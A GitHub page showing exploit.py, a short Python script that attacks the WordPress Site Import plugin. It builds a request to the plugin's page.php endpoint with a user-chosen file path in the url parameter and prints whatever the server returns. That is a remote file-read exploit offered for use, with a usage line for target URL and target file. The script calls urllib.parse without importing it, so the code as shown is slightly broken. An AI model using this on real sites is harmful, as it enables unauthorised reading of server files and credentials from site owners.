-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
32 lines (27 loc) · 1.24 KB
/
exploit.py
File metadata and controls
32 lines (27 loc) · 1.24 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/env python3
import sys
import requests
'''
This program is free software: you can redistribute it and/or modify it under the terms of the
GNU General Public License as published by the Free Software Foundation, version 2 of the
License.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not,
see <https://www.gnu.org/licenses/>.
'''
def setup():
if len(sys.argv) != 3:
sys.stderr.write("Usage: <" + sys.argv[0] + "> <RHOST URL> <TARGET FILE>")
quit()
rhost_url = sys.argv[1]
rhost_uri = "/wp-content/plugins/site-import/admin/page.php?url="
target_file = urllib.parse.quote(sys.argv[2])
return rhost_url, rhost_uri, target_file
def exploit(rhost_url, rhost_uri, target_file):
response = requests.get(rhost_url + rhost_uri + target_file).text
print(response)
if __name__ == "__main__":
rhost_url, rhost_uri, target_file = setup()
exploit(rhost_url, rhost_uri, target_file)